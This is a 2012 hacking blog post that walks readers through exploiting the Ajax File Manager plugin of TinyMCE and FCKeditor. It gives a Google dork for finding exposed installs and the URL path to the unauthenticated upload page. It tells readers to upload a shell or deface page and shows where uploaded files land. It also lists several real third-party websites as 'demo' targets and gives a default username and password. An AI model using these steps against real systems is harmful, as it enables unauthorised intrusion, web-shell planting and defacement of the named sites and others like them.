|Hacks|Crack|Tips |Tricks|Cracks |Programs|Tutorials |Movies|Games|

Breaking

Saturday, September 22, 2012

Upload Shell | Deface Page | Ajax File Manager Vulnerability

Hello Friends Me !!! Chinmoy Going to tell u about Upload Shell | Deface Page | Ajax File Manager Vulnerability


372186_100002061928187_1094618549_n.jpg (180×178)
Open Google Search Engine, Type this dork :inurl:/plugins/ajaxfilemanager/
For Example I got : 

http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/session/

 or http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/jscripts/edit_area/reg_syntax/
or any site else ...
Now Put  ajaxfilemanager/ajaxfilemanager.php after /plugins/ in url 


for example : 
http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php
http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php


Now Find Upload Upload and Upload Your shell/Deface/file


To view you File find /Uploaded/ directory in Website by using your brain :P


example of uploaded file : http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/aaaaaaaa.txt
http://www.ziaislamic.com/BOOK-CMS/interfaces/uploaded/aaaaaaaa.txt


Some Demo sites


http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php
http://www.thebradshawscornershop.co.uk/scripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
http://202.137.23.162/brantas_portal/assets/tinymce/plugins/ajaxfilemanager/ajaxfilemanager.php
http://www.apmsa.org.za/admin/scripts/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php


Results : 
http://www.ziaislamic.com/BOOK-CMS/interfaces/uploaded/yourfilehere
http://www.thebradshawscornershop.co.uk/images/yourfilehere
http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/yourfilehere
http://202.137.23.162/brantas_portal/uploaded_docimage/yourfilehere
http://www.apmsa.org.za/admin/scripts/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/yourfilehere


if you need Login in any ajaxfilemanager 


Default Password Ajax File Manager
Username:ajax
Password:123456

No comments:

Post a Comment